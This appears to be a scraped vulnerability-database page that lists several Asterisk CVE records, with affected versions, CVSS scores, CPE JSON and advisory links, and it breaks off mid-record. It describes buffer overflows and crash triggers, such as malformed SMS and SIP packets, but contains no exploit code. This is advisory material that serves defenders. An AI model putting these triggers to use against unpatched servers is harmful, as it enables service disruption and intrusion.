digium	asterisk_digiumphones	10.12.1
digium	asterisk_digiumphones	10.12.2
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1224686C-8A1E-40E1-ACB9-87F571641EAD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B63FB1C5-9704-4C6A-8DE6-2283D1993BA3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DE14D16B-4903-47BD-BCBD-28A8B6B878E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0992625B-012F-40EA-9A20-6352E633F62B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E3828876-DDB4-457D-8E50-43A4FF761005",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79283554-AF08-44DC-BF98-446C47AA490A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "54EBFD0B-686F-477F-8FF2-535F24A3348B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0961F130-FF8C-41C2-BF2E-9731ED9EB73B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE78F4A2-B165-446C-AA1C-7A9E13718C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9789FC49-DE20-4477-B9D5-12CB71F42E58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DD97918-B589-4422-B695-C3C00203A3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1E59E84-F3FF-44FF-BC7D-31F3880E32F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2D9C7006-F5B1-4171-BB44-182C39DE3AAC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8D2B210-3ADA-40AD-A575-DB88A9F71C91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F7C53CD-260C-49F5-BCA4-E1D0A58E0B29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB19B2F7-5685-449F-858C-C226D2A373B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D10B9E8C-3B72-490B-A276-A745299DA3C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E63CF763-0682-4453-8D07-C9253C179486",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FDB7AA1-25A7-4BED-A875-C0494E973EA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E0BCE319-8C87-4521-BEAA-02F0EF47B315",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A2534F0-3DEE-4FCB-B15D-97D1836CE83D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "D3F38B78-8215-43D6-8C5C-6DB8E6C34F06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE54B76B-4713-4281-AB4B-B17901121B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "08EE9963-2A44-48A0-8A1B-919CCE3652FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "19C7B58B-6591-45B5-B527-50FA0A5BD1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "05D3825F-3B95-4056-AF3C-43269734BA2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "806F60DA-FAA1-4C13-889B-0FF518C01E44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6DDE265-B4B9-495A-95F7-0910E8199980",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6B7AE7FB-8170-41AD-9597-07335D36AE48",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9131FB32-E3F0-476C-A0D1-36E2101631D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5209356B-4A86-4C93-9D04-C66969F23BC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9AF5750B-2348-4E35-9F08-27E2385E329F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C0344FE7-952A-4BC5-A31F-F2C5EABDB5FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "960521C4-9004-4412-8A38-66240C4B875D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "00F26342-110F-4163-AD11-98AA3B71D299",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8652FA73-2F02-401C-890F-0544276294D3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en la funci\u00f3n unpacksms16 en apps/app_sms.c en Asterisk Open Source 1.8.x en versiones anteriores a 1.8.24.1, 10.x en versiones anteriores a 10.12.4 y 11.x en versiones anteriores a 11.6.1; Asterisk con Digiumphones 10.x-digiumphones en versiones anteriores a 10.12.4-digiumphones y Certified Asterisk 1.8.x en versiones anteriores a 1.8.15-cert4 y 11.x en versiones anteriores a 11.2-cert3 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda de demonio) a trav\u00e9s de un mensaje 16-bit SMS con un n\u00famero impar de bytes, lo que desencadena un bucle infinito."
    }
  ],
  "id": "CVE-2013-7100",
  "lastModified": "2024-11-21T02:00:20.920",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-12-19T22:55:04.570",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2013-006.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/101100"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/56294"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2014/dsa-2835"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:300"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/64364"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1029499"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89825"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22590"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2013-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/101100"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/56294"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2014/dsa-2835"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:300"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/64364"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1029499"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89825"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22590"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2003-09-17 04:00

Modified

2024-11-20 23:45

Severity ?

Summary

Buffer overflow in the get_msg_text of chan_sip.c in the Session Initiation Protocol (SIP) protocol implementation for Asterisk releases before August 15, 2003, allows remote attackers to execute arbitrary code via certain (1) MESSAGE or (2) INFO requests.

References

▼	URL	Tags
	cve@mitre.org	http://www.atstake.com/research/advisories/2003/a090403-1.txt	Exploit, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://www.atstake.com/research/advisories/2003/a090403-1.txt	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	digium	asterisk	1.2.13

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "4611BEA0-25EC-4705-A390-6DF678373FF0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in the get_msg_text of chan_sip.c in the Session Initiation Protocol (SIP) protocol implementation for Asterisk releases before August 15, 2003, allows remote attackers to execute arbitrary code via certain (1) MESSAGE or (2) INFO requests."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en el get_msg_text de chan_sip.c en el protocolo de iniciaci\u00f3n de sesi\u00f3n de entregas de Asterisk anteriores al 15/08/2003, permite a atacantes remotos ejecutar c\u00f3digo arbitrario mediante ciertas peticiones MESSAGE o INFO."
    }
  ],
  "id": "CVE-2003-0761",
  "lastModified": "2024-11-20T23:45:27.853",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2003-09-17T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.atstake.com/research/advisories/2003/a090403-1.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.atstake.com/research/advisories/2003/a090403-1.txt"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2007-03-07 00:19

Modified

2024-11-21 00:28

Severity ?

Summary

Asterisk 1.4 before 1.4.1 and 1.2 before 1.2.16 allows remote attackers to cause a denial of service (crash) by sending a Session Initiation Protocol (SIP) packet without a URI and SIP-version header, which results in a NULL pointer dereference.

References

URL	Tags
cve@mitre.org	http://asterisk.org/node/48319
cve@mitre.org	http://asterisk.org/node/48320
cve@mitre.org	http://labs.musecurity.com/advisories/MU-200703-01.txt
cve@mitre.org	http://secunia.com/advisories/24380
cve@mitre.org	http://secunia.com/advisories/24578	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/25582	Vendor Advisory
cve@mitre.org	http://security.gentoo.org/glsa/glsa-200703-14.xml
cve@mitre.org	http://www.debian.org/security/2007/dsa-1358
cve@mitre.org	http://www.kb.cert.org/vuls/id/228032	US Government Resource
cve@mitre.org	http://www.novell.com/linux/security/advisories/2007_34_asterisk.html
cve@mitre.org	http://www.osvdb.org/33888
cve@mitre.org	http://www.securityfocus.com/bid/22838
cve@mitre.org	http://www.securitytracker.com/id?1017723
cve@mitre.org	http://www.vupen.com/english/advisories/2007/0830	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/32830
af854a3a-2127-422b-91ae-364da2661108	http://asterisk.org/node/48319
af854a3a-2127-422b-91ae-364da2661108	http://asterisk.org/node/48320
af854a3a-2127-422b-91ae-364da2661108	http://labs.musecurity.com/advisories/MU-200703-01.txt
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/24380
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/24578	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/25582	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://security.gentoo.org/glsa/glsa-200703-14.xml
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2007/dsa-1358
af854a3a-2127-422b-91ae-364da2661108	http://www.kb.cert.org/vuls/id/228032	US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.novell.com/linux/security/advisories/2007_34_asterisk.html
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/33888
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/22838
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1017723
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/0830	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/32830

Impacted products

Vendor	Product	Version
digium	asterisk	1.2.0_beta1
digium	asterisk	1.2.0_beta2
digium	asterisk	1.2.6
digium	asterisk	1.2.7
digium	asterisk	1.2.8
digium	asterisk	1.2.9
digium	asterisk	1.2.10
digium	asterisk	1.2.11
digium	asterisk	1.2.12
digium	asterisk	1.2.12.1
digium	asterisk	1.2.13
digium	asterisk	1.2.14
digium	asterisk	1.2.15
digium	asterisk	1.2_beta1
digium	asterisk	1.2_beta2
digium	asterisk	1.4.0
digium	asterisk	1.4.0_beta1
digium	asterisk	1.4.0_beta2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4042CC21-F3CB-4C77-9E60-AF8AA9A191C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C656168D-7D6A-4E84-9196-A8B170E1F7CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "C619138A-557F-419E-9832-D0FB0E9042C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6656EA0-4D4F-4251-A30F-48375C5CE3E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "4AAD9104-BA4A-478F-9B56-195E0F9A7DF5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.9:*:*:*:*:*:*:*",
